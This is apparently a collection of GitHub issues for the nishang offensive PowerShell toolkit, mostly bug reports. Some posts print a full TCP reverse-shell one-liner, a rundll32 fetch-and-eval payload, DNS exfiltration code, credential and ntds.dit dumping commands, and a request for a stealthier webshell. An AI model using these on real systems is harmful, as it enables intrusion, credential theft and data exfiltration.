
nishang's Issues

[Question] What's the meaning of `nishang`?

This is a relatively silly question, and I will try not to be like a dick.
I am Chinese. I came across nishang and liked it very much. My question is: what does the word nishang actually mean? In Chinese, there is a word "你上" with exactly the same pronunciation ("Nǐ Shàng" in Pinyin), which means "it's your turn, go ahead". I am wondering if there is any connection between these two words. Thanks very much!

Get-PassHashes not working on Windows 10

Get-PassHashes does not work on Windows 10 1607. It always returns empty LM/NTLM hashes on execution.
I attached a screenshot that shows the problem on a test machine. On the left side is the output from Get-PassHashes, on the right side is the (correct) output from mimikatz.

How to upgrade reverse shell netcat session to meterpreter?

Hi, I would like to ask if anyone knows how to upgrade the "Invoke-PowerShellTcpOneLine.ps1" reverse shell netcat session to a meterpreter shell session?

I have tried listening for the callback from your ps1 file using msfconsole with different payloads like windows/x64/meterpreter/reverse_tcp. It detects the session and just dies. Does anyone know a workaround? Thank you

Error running Get-LsaSecret

When running Get-LsaSecret I am getting this error on every secret name:
WARNING: lsaNtsStatusToWinError: 1305
Cannot convert null to type "LSAUtil.LSAUtil+LSA_UNICODE_STRING".
At C:\temp\get-lsasecret.ps1:214 char:101

  •     [LSAUtil.LSAUtil+LSA_UNICODE_STRING][System.Runtime.InteropServices.marshal]::PtrToStructure <<<< ($privateData, [System.Type][LSAUtil.LSAUtil+LSA_UNICODE_STRING])
    
    • CategoryInfo : NotSpecified: (:) [], RuntimeException
    • FullyQualifiedErrorId : RuntimeException

Apt-get install Forbidden IP Kali Linux

Hello

While running apt-get update in Kali Linux I am receiving the below error for the package nishang:

Failed to fetch http://archive-9.kali.org/kali kali-rolling/main amd64 nishang all 0.7.6-0kali1_all.deb 403 Forbidden [IP: 167.114.191.148 80]

I have tried other mirrors but they all report the same above Forbidden error.

If this issue needs to be reported to Kali or the apt team please let me know and close this issue.

Thanks.

difficulty in doing DNS TXT exfiltration

_DNS_TXT_Pwnage -StartDomain start.abc.com -cmdstring begincommands -CommandDomain command.abc.com -psstring startscript -PSDomain script.abc.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop
---> The above command gave me the list of processes on the infected machine.

However, when I started to use this command to exfiltrate the data, I got the error "Can't find server address for 'DNS'"
_DNS_TXT_Pwnage -StartDomain start.abc.com -cmdstring begincommands -CommandDomain command.abc.com -psstring startscript -PSDomain script.abc.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop -exfil -ExfilOption DNS -DomainName abc.com

I created private nameservers, and changed the default nameservers of the domain to ns1.abc.com and ns2.abc.com.
This is the command that I ran, and the message is "Request to UnKnown timed-out"

DNS_TXT_Pwnage -AuthNS ns1.abc.com -StartDomain start.abc.com -cmdstring begincommands -CommandDomain command.abc.com -psstring startscript -PSDomain script.abc.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop -exfil -ExfilOption DNS -DomainName abc.com

Would anyone please tell me where I am wrong?

MS16-065- TLS/SSL Protocol update

This update affects the way the encryption component of .NET sends and receives encrypted packets. It splits the first record after the handshake (1 byte + remaining bytes). I was modifying my own scripts and was testing your Invoke-PoshRatHTTPs with them. I couldn't figure out why I was getting the packets split. I just had to change the protocol to TLS12 from TLS in your script and in my own client.

More specific:
$SslStream.AuthenticateAsServer($SSLcertfake, $false, [System.Security.Authentication.SslProtocols]::Tls12, $false)

I figured I'd let you know so that the script is up to date, and to help others with the same issue.

P.S. Amazing job and thank you for sharing your knowledge ! 👍

Reference:
https://support.microsoft.com/en-us/kb/3155464

Exception setting "DisplayAlerts": "Cannot convert value "False" to type "Microsoft.Office.Interop.Word.WdAlertLevel"

Seems to be the same bug as - #6.

Word Version: Microsoft® Office 2010 (14.0.4762.1000) MSO (14.0.6112.5000)

c:\ >powershell -command "& { . .\Out-Word.ps1 ; Out-Word -WordFileDir templates -PayloadURL http://domain.com/psh }"
Exception setting "DisplayAlerts": "Cannot convert value "False" to type "Microsoft.Office.Interop.Word.WdAlertLevel".
Error: "Invalid cast from 'System.Boolean' to 'Microsoft.Office.Interop.Word.WdAlertLevel'.""
At C:\Users\nmonkee\Desktop\Out-Word.ps1:179 char:13

  •         $Word.DisplayAlerts = $False
    
  •         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : NotSpecified: (:) [], SetValueInvocationException
    • FullyQualifiedErrorId : ExceptionWhenSetting

Exfiltration doesn't work when using Powerpreter with HTTP-Backdoor

While using Powerpreter with HTTP-Backdoor, DNS_TXT_Pwnage and Execute-On-Time, an error is being thrown while using Exfiltration.

" does not belong to the set "gmail,pastebin,WebServer,DNS" specified by
the ValidateSet attribute. Supply an argument that is in the set and then
try the command again."

Reported by a user to me on email.

index was outside of the bounds of the array

Hello,

So I'm trying to figure out why I get "index was outside the bounds of the array" when trying to use out-word.ps1 with your TCP one-liner reverse shell? It's the same with a local webserver when I try to import my own ps1 code, e.g. -PayloadURL http://x.x.x.x/test.ps1; still the same issue!

Do you still support it, or is it abandoned?

Thanks in advance - e.g. the keen student :)

Out-Excel (script and Powerpreter function) does not execute the payload when -PayloadURL parameter is used

Reported by Anonymous user on my blog:
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html?showComment=1425505599206#c811251326834686943

Hey! Awesome work! Love your blog and the awesome things you are doing in Powershell!

Just a quick fix on your code: In your code for "Out-Excel" and "powerpreter", when you create the variable $Payload for the -PayloadURL, you have the syntax in the code as:

objProcess.Create '$Payload', Null, objConfig, intProcessID

The single quotes cause the payload to fail, so I changed it to double quotes:

objProcess.Create "$Payload", Null, objConfig, intProcessID

and that worked perfectly! I just wanted to let you know. Keep up the awesome work!

Missing License

Hello,
I didn't find any mention of the license for nishang. It would be good to specify the license in the readme and / or add a license file.
Thanks.

Copy-VSS fails when NTDS is not on C drive

I noticed that when passing a path to the NTDS.dit file, using the ntdsSource argument, it fails when trying to copy from the shadow.

Take for instance the supplied example (https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1#L27):

Copy-VSS -DestinationDir C:\temp -ntdsSource D:\ntds\ntds.dit
                                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^

This fails with the following:

The filename, directory name, or volume label syntax is incorrect.

This is due to the script first making a shadow copy of the C drive (https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1#L53):

(Get-WmiObject -list win32_shadowcopy).Create("C:\","ClientAccessible")

Then later, it tries to copy from the supplied ntdsSource (https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1#L70), which using the example above will look like this:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[ID]\D:\ntds\ntds.dit
                                                        ^^^^^^^^^^^^^^^^

This fails because of two things:

  • The supplied shadow copy is of the C drive
  • The path passed to copy should not include drive letter

I guess there should be some check whether the supplied ntdsSource is on the C drive, and if not, a separate shadow copy of that drive needs to be taken. Further, the ntdsSource variable needs to be modified so the drive letter is removed, so that the command becomes:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[ID]\ntds\ntds.dit

I ended up running the commands manually, which doesn't take much effort.

Just a heads up :-)

Issue with Gmail option in Do-Exfiltration function of Powerpreter

When using the Gmail option in the Do-Exfiltration function of Powerpreter it throws the following error:

Exception calling "Send" with "1" argument(s): "Failure sending mail."
At C:\ps\nishang\powerpreter\powerpreter.psm1:3899 char:19

  •     $smtp.Send <<<< ($msg)
    
    • CategoryInfo : NotSpecified: (:) [], MethodInvocationException
    • FullyQualifiedErrorId : DotNetMethodException

I get this error when using Do-Exfiltration with the Gmail option both with the pipeline and without it. The "Allow less secure apps" security option in Gmail is checked.

These are the lines I've used:

Get-Information | Do-Exfiltration -ExfilOption gmail -username MyUsername -Password MyPassword

Do-Exfiltration -Data Get-Information -Exfiloption gmail -Username MyUsername -Password MyPassword

Tested on two VMs and two regular boxes (x64 and x86), all with the same result.

new release

Is it possible to build a new release from the latest master?

Antak Stealth Request

Would it be possible to incorporate a check for a POST variable matching a certain string and otherwise serve up a 404 error? Something similar to the following:

<%--Antak - A Webshell which utilizes powershell.--%>

<script Language="c#" runat="server">
if (Request.Form["language"] != "whatever")
{
    context.Response.StatusCode = 404;
    context.Response.End();
    return;
}
else
{
 ...rest of code...
}

Import-Module

Hello, community!

PS writes this error:

Import-Module : File C:\nishang\nishang.psm1 cannot be loaded because the execution of scripts is disabled on this system.

What should I do?

P.S. I use win7x64

Script error on rundll32 - macro

I am getting a script error every time I run the macro produced from Out-Word -Payload 'rundll32.exe javascript:""..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");w=new%20ActiveXObject(""WScript.Shell"");try{v=w.RegRead(""HKCU\Software\Microsoft\Windows\CurrentVersion\Internet%20Settings\ProxyServer"");try{q=v.split(""="")[1].split("";"")[0];h.SetProxy(2,q);}catch(e){h.SetProxy(2,v);}}finally{h.Open(""GET"",""http://IP_Address_here:80/connect"",false);h.Send();B=h.ResponseText;eval(B)}'.

Once Enable Content is clicked the script error appears. Am I missing something in the syntax?

Out-word.ps1 error

PS C:\Users\eMO\desktop> . ./Out-word.ps1
PS C:\Users\eMO\desktop> Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process" -RemainSafe
You cannot call a method on a null-valued expression.
At C:\Users\eMO\desktop\Out-Word.ps1:357 char:9

  •     $DocModule = $Doc.VBProject.VBComponents.Item(1)
    
  •     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At C:\Users\eMO\desktop\Out-Word.ps1:358 char:9

  •     $DocModule.CodeModule.AddFromString($code_one)
    
  •     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : InvokeMethodOnNull

Saved to file C:\Users\eMO\desktop\Salary_Details.doc
0
PS C:\Users\eMO\desktop>

Another small bug in Gather/Copy-VSS.ps1

There is an error when I run Copy-VSS, as in the following picture:

To fix this error, I tried removing the backticks (`) in lines 66, 67, 70 and 74.

The modified code:

    cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $SAMpath
    cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SYSTEM" $SYSTEMpath
    if($ntdsSource)
    {
        cmd /c copy "$($volume.DeviceObject)\$ntdsSource\ntds.dit" $ntdspath
    }
    else
    {
        cmd /c copy "$($volume.DeviceObject)\windows\system32\ntds.dit" $ntdspath
    }

Running Copy-VSS after the modification, it looks like it runs correctly.

No output produced

Hello!

I'm running into issues with the output of ExetoText; maybe I am doing something incorrectly!
PS C:\Users\Admin\Documents\WindowsPowerShell\Modules\nishang\Utility> .\ExetoText.ps1 C:\Users\Admin\Documents\WindowsPowerShell\Modules\nishang\Utility\crss.exe C:\Users\Admin\Documents\WindowsPowerShell\Modules\nishang\Utility\crss.txt
PS C:\Users\Admin\Documents\WindowsPowerShell\Modules\nishang\Utility>

And there is no output!

import module powerpreter

I'm trying to import powerpreter from the file directory with Import-Module .\Powerpreter.psm1 but I get the error

At C:\users\desktop\desktop\nishang-master\powerpreter\Powerpreter.psm1:1 char:1

  • <#
  • ~~
    This script contains malicious content and has been blocked by your antivirus software.
    • CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
    • FullyQualifiedErrorId : ScriptContainedMaliciousContent

Import-Module : The specified module '.\Powerpreter.psm1' was not loaded because no valid module file was found in any module directory.
At line:1 char:1

  • Import-Module .\Powerpreter.psm1
  •   + CategoryInfo          : ResourceUnavailable: (.\Powerpreter.psm1:String) [Import-Module], FileNotFoundException
      + FullyQualifiedErrorId : Modules_ModuleNotFound,Microsoft.PowerShell.Commands.ImportModuleCommand

I'm running as administrator with the execution policy set to unrestricted, and I have turned off AV.

What can I be doing wrong?

Thanks

HTTP-Backdoor MagicString Comparison

In Http-Backdoor, there is a -eq comparison with MagicString to determine if a file can be downloaded (line 175 of commit f4d7fda). Most files, when created, automatically get whitespace characters appended at the end (e.g. tested on Linux), which makes an exact comparison very hard to get. I suggest removing trailing whitespace characters before testing.

    $filecontent = $webclient.DownloadString("$CheckURL")
    $filecontent = $filecontent.TrimEnd() ##### Change here - trim the downloaded content #####
    if($filecontent -eq $MagicString)
    {
        $script:pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)

Only want to execute a simple Get-Process command on the victim and exfil to pastebin

Hi,
Amazing work on DNS_TXT_Pwnage!

I only want to execute a Get-Service command and exfil that result to pastebin.

Can you please tell me the correct command?

I have created a TXT record for start.mydomain.com with "begincommands"
I have created a TXT record for command.mydomain.com with "Get-Service"

I am importing the DNS_TXT_Pwnage.ps1 with Import-Module and then ....
DNS_TXT_Pwnage -StartDomain start.mydomain.com -cmdstring begincommands -CommandDomain command.mydomain.com -psstring startscript -PSDomain script.mydomain.com -Subdomains 2 -StopString stop -exfil -ExfilOption pastebin apikey username password

The command gets executed but I cannot exfil; I also tried gmail.

Can you please help ?

dpapi::chrome "/unprotect" error

https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1

When I run this command
Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

I get an error for /unprotect, so mimikatz will not decrypt the Chrome file.
What am I doing wrong?

Error:
Invoke-Mimikatz : A positional parameter cannot be found that accepts argument '/unprotect'.
At C:\Users\test\Desktop\mimikatz nishang\Invoke-Mimikatz.ps1:2754 char:1

  • Invoke-Mimikatz -Command dpapi::chrome /in:"%localappdata%\Google\Chr ...

And if I run this command
Invoke-Mimikatz -Command '"dpapi::chrome /in:""%localappdata%\Google\Chrome\User Data\Default\Login Data"" /unprotect"'

I get this error
mimikatz(powershell) # dpapi::chrome /in:
ERROR kuhl_m_dpapi_chrome ; Input 'Login Data' file needed (/in:"%localappdata%\Google\Chrome\User Data\Default\Login Data")

mimikatz(powershell) # %localappdata%\Google\Chrome\User Data\Default\Login Data"
ERROR mimikatz_doLocal ; "C:\Users\user4\AppData\Local\Google\Chrome\User" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

        exit  -  Quit mimikatz
         cls  -  Clear screen (doesn't work with redirections, like PsExec)
      answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
      coffee  -  Please, make me a coffee!
       sleep  -  Sleep an amount of milliseconds
         log  -  Log mimikatz input/output to file
      base64  -  Switch file input/output base64
     version  -  Display some version informations
          cd  -  Change or display current directory
   localtime  -  Displays system local date and time (OJ command)
    hostname  -  Displays system local hostname

mimikatz(powershell) # /unprotect
ERROR mimikatz_doLocal ; "/unprotect" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

        exit  -  Quit mimikatz
         cls  -  Clear screen (doesn't work with redirections, like PsExec)
      answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
      coffee  -  Please, make me a coffee!
       sleep  -  Sleep an amount of milliseconds
         log  -  Log mimikatz input/output to file
      base64  -  Switch file input/output base64
     version  -  Display some version informations
          cd  -  Change or display current directory
   localtime  -  Displays system local date and time (OJ command)
    hostname  -  Displays system local hostname

Invoke-PowerShellTcpOneLine.ps1 errors

Good day, I am new to this and following the process; I am getting this error on all Windows 7 or 8 PCs

PS C:> powershell "IEX (New-Object Net.WebClient).DownloadString('http://mywebserver/Invoke-PowerShellTcpOneLine.ps1
');"
IEX : At line:147 char:190

  • ... ata-ga-click="(Logged out) Header, go to Features">Features <span cla ...
  •                                                             ~
    

The '<' operator is reserved for future use.
At line:147 char:261

  • ... ="Bump-link-symbol float-right text-normal text-gray-light">→</s ...
  •                                                             ~
    

The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:160 char:251

  • ... ogged out) Header, go to Customer stories">Customer stories <span cla ...
  •                                                             ~
    

The '<' operator is reserved for future use.
At line:160 char:322

  • ... ="Bump-link-symbol float-right text-normal text-gray-light">→</s ...
  •                                                             ~
    

The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:161 char:231

  • ... ata-ga-click="(Logged out) Header, go to Security">Security <span cla ...
  •                                                             ~
    

The '<' operator is reserved for future use.
At line:161 char:302

  • ... ="Bump-link-symbol float-right text-normal text-gray-light">→</s ...
  •                                                             ~
    

The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:181 char:223

  • ... -click="(Logged out) Header, go to Features">Explore GitHub <span cla ...
  •                                                             ~
    

The '<' operator is reserved for future use.
At line:181 char:294

  • ... ="Bump-link-symbol float-right text-normal text-gray-light">→</s ...
  •                                                             ~
    

The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:184 char:102

  • ... light text-normal text-mono f5 mb-2 border-top pt-3">Learn & con ...
  •                                                             ~
    

The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
At line:217 char:185

  • ... r" data-ga-click="(Logged out) Header, go to Pricing">Plans <span cla ...
  •                                                             ~
    

The '<' operator is reserved for future use.
Not all parse errors were reported. Correct the reported errors and try again.
At line:1 char:1

  • IEX (New-Object Net.WebClient).DownloadString('http://104.248.59.211/ ...
  •   + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException
      + FullyQualifiedErrorId : RedirectionNotSupported,Microsoft.PowerShell.Commands.InvokeExpressionCommand

Has anyone seen this?

thanks

DL-Execute-PS Overwrite Issue

Currently the download execute ps script overwrites the first downloaded script on every run. I would propose adding a filename randomization and overwrite checking function.

Out-Word throws an Error "You cannot call a method on a null-valued expression":

Reported on my blog as comment:

http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html?showComment=1417565010863#c4275766763153435120

I am currently looking into the issue; the solution proposed is:
http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html?showComment=1417608458188#c7165076314488271651

Out-Word, namely "You cannot call a method on a null-valued expression":

Exception setting "DisplayAlerts": "Cannot convert value "False" to type "Micro
soft.Office.Interop.Word.WdAlertLevel". Error: "Invalid cast from 'System.Boole
an' to 'Microsoft.Office.Interop.Word.WdAlertLevel'.""
At C:\Users\test\Desktop\nishang\Client\Out-Word.ps1:127 char:11

  • $Word. <<<< DisplayAlerts = $False
  • CategoryInfo : InvalidOperation: (:) [], RuntimeException
  • FullyQualifiedErrorId : PropertyAssignmentException

You cannot call a method on a null-valued expression.
At C:\Users\test\Desktop\nishang\Client\Out-Word.ps1:202 char:54

  • $DocModule = $Doc.VBProject.VBComponents.Item <<<< (1)
  • CategoryInfo : InvalidOperation: (Item:String) [], RuntimeExcep
    tion
  • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At C:\Users\test\Desktop\nishang\Client\Out-Word.ps1:203 char:44

  • $DocModule.CodeModule.AddFromString <<<< ($code)
  • CategoryInfo : InvalidOperation: (AddFromString:String) [], Run
    timeException
  • FullyQualifiedErrorId : InvokeMethodOnNull

Argument: '1' should be a System.Management.Automation.PSReference. Use [ref].
At C:\Users\test\Desktop\nishang\Client\Out-Word.ps1:204 char:20

  • $Doc.Saveas <<<< ($OutputFile, 0)
  • CategoryInfo : NotSpecified: (:) [], MethodException
  • FullyQualifiedErrorId : NonRefArgumentToRefParameterMsg

Need Better Requirement Processing i.e. "modules specified by "#requires" are missing: ActiveDirectory. "

PS /home/ezri/htb> import-module ./nishang/nishang.psm1
Import-Module: /home/ezri/htb/nishang/nishang.psm1:24
Line |
24 | … )} | ForEach-Object {Import-Module $_.FullName -DisableNameChecking}
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| The script 'Add-ConstrainedDelegationBackdoor.ps1' cannot be run because the
| following modules that are specified by the "#requires" statements of the script are
| missing: ActiveDirectory.

Import-Module: /home/ezri/htb/nishang/nishang.psm1:24
Line |
24 | … )} | ForEach-Object {Import-Module $_.FullName -DisableNameChecking}
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| The script 'Add-ConstrainedDelegationBackdoor.ps1' cannot be run because the
| following modules that are specified by the "#requires" statements of the script are
| missing: ActiveDirectory.

WARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb.
WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~
PS /home/ezri/htb>

There may be a small bug in nishang/Gather/Copy-VSS.ps1

Lines 66 and 67 copy SAM twice:

    `cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $SAMpath`
    `cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $SYSTEMpath`

So Copy-VSS cannot copy the SYSTEM hive. I guess line 67 should be

    `cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SYSTEM" $SYSTEMpath`

HTTP-Backdoor and DNS_TXT_Pwnage are unable to execute script modules like Powerpreter

Raised by an anonymous user on my blog:
http://www.labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html?showComment=1425521883045#c1183207693915153071

Awesome work! I have a question on your HTTP-backdoor code execution. Maybe I'm reading into it or I'm missing something, so hopefully you can help me out.

When using the HTTP backdoor, how does the code execution actually work? I understand how it downloads the script, but giving that script a command, how does that work? For example:

I host the PowerShell script for your powerpreter on http://pastebin.com/powerpreter.psm1

I use the HTTP-backdoor with a magic string, and it goes to my pastebin and downloads the powerpreter. How do I give the powerpreter commands, like Get-Information? Until I give the stopstring, does the powerpreter run in the same PowerShell instance, or does it spawn a new one each time?

Hope this wasn't too confusing. Just asking for a bit of guidance! Thanks!

Losing information when using DNS TXT exfiltration

Regarding DNS_TXT_Pwnage.ps1, using the DNS exfiltration option:

{
    $lengthofsubstr = 0
    $code = Compress-Encode
    $queries = [int]($code.Length/63)
    while ($queries -ne 0)
    {
        $querystring = $code.Substring($lengthofsubstr,63)
        Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $ExfilNS"
        $lengthofsubstr += 63
        $queries -= 1
    }
    $mod = $code.Length%63
    $query = $code.Substring($code.Length - $mod, $mod)
    Invoke-Expression "nslookup -querytype=txt $query.$DomainName $ExfilNS"
}

The variable ($querystring) is base64 encoded, which means that it can contain uppercase characters. However, the nslookup command, or DNS queries in general, are sent only in lowercase. On the DNS C2 side, we can't get all the information and the decompression routine will not work.
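The case-folding loss described in this post, looked at from the defender's side. This is an added Python example, not nishang code: it models the 63-character labels the quoted loop emits, flags them in constructed resolver log lines, and shows why lowercased base64 does not decode back to the original bytes. The log line format, the minimum label length and the "last two labels are the domain" rule are assumptions made for the example.

```python
"""Defender-side look at the chunked DNS TXT queries discussed above."""
import base64
import re
from collections import Counter

LABEL_LEN = 63  # chunk size used by the quoted loop (also the DNS label limit)

# A label this long made only of base64 characters is unusual for a legitimate
# hostname. The minimum length (32) is an assumed tuning knob, not a standard.
BASE64_LABEL = re.compile(r"^[A-Za-z0-9+/=]{32,63}$")


def labels_as_emitted(code: str) -> list:
    """Model the labels the quoted loop produces from one encoded blob:
    full 63-character slices first, then the remainder as a shorter label."""
    cut = len(code) - len(code) % LABEL_LEN
    full = [code[i:i + LABEL_LEN] for i in range(0, cut, LABEL_LEN)]
    tail = code[cut:]
    return full + ([tail] if tail else [])


def suspicious_labels(qname: str, domain: str) -> list:
    """Labels left of `domain` in `qname` that look like base64 chunks."""
    suffix = "." + domain.lower()
    if not qname.lower().endswith(suffix):
        return []
    prefix = qname[: -len(suffix)]
    return [lab for lab in prefix.split(".") if BASE64_LABEL.match(lab)]


def scan_log(lines, min_hits: int = 2) -> dict:
    """Count base64-looking TXT queries per (client, domain) and return the
    pairs that reach `min_hits`. Lines are 'timestamp client qname qtype',
    a constructed format assumed for this example."""
    hits = Counter()
    for line in lines:
        parts = line.split()
        if len(parts) != 4 or parts[3] != "TXT":
            continue
        _, client, qname, _ = parts
        # Assumption: the registered domain is the last two labels
        # (no public-suffix handling here).
        domain = ".".join(qname.rstrip(".").split(".")[-2:])
        if suspicious_labels(qname, domain):
            hits[(client, domain)] += 1
    return {key: n for key, n in hits.items() if n >= min_hits}


def case_fold_survives(data: bytes) -> bool:
    """True only if lowercasing the base64 text, as the post says happens to
    the queries, still decodes to the original bytes (it normally does not)."""
    folded = base64.b64encode(data).decode().lower()
    try:
        return base64.b64decode(folded, validate=True) == data
    except ValueError:  # binascii.Error is a ValueError subclass
        return False


# Constructed sample: an encoded blob and the resolver log lines a run of the
# quoted loop would leave behind (client, domain and contents are made up).
SAMPLE_CODE = base64.b64encode(
    b"SSID=corp-wifi KEY=constructed-example-key\n" * 5).decode()
SAMPLE_LOG = [
    "2018-06-10T11:56:01Z 10.0.0.5 www.example.com A",
    "2018-06-10T11:56:02Z 10.0.0.5 mail.example.com MX",
] + [f"2018-06-10T11:56:03Z 10.0.0.5 {lab}.abc.com TXT"
     for lab in labels_as_emitted(SAMPLE_CODE)]


if __name__ == "__main__":
    for (client, domain), n in scan_log(SAMPLE_LOG).items():
        print(f"{client} sent {n} base64-looking TXT queries under {domain}")
    print("lowercased base64 still decodes:", case_fold_survives(b"Hello, world"))
```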

Invoke-PowerShelltcpOneLine Windows10 errors

Lately I have been getting this error when running the TCP one-liner on Windows 10

New-Object : Exception calling ".ctor" with "2" argument(s): "A socket operation was attempted to an unreachable
network 192.168.1.10:8888"
At line:2 char:11

  • $client = New-Object System.Net.Sockets.TCPClient('192.168.1.10',8888);$s ...
  •       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
    • FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand

You cannot call a method on a null-valued expression.
At line:2 char:68

  • ... kets.TCPClient('192.168.1.10',8888);$stream = $client.GetStream();[byte[] ...
  •                                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:2 char:136

  • ... 65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) ...
  •                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:2 char:484

  • ... .Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
  •                                                       ~~~~~~~~~~~~~~~
    
    • CategoryInfo : InvalidOperation: (:) [], RuntimeException
    • FullyQualifiedErrorId : InvokeMethodOnNull

Which is strange; I usually don't have any problems during my tests. Any help would be golden.

Invoke-PowerShellTcpOneLine.ps1 prints newline between successive lines.

The "Invoke-PowerShellTcpOneLine.ps1" reverse shell prints new lines between successive lines for, e.g. the ls command. I'm using netcat as the listener to which the shell connects.

I've looked at the code, and I can't seem to locate the issue:

#$client = New-Object System.Net.Sockets.TCPClient('192.168.254.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()


How could it be fixed?

Furthermore, using commands like net users /domain only returns the "The request will be processed at a domain controller for domain..." intermediary response, and not the full response from the domain controller?
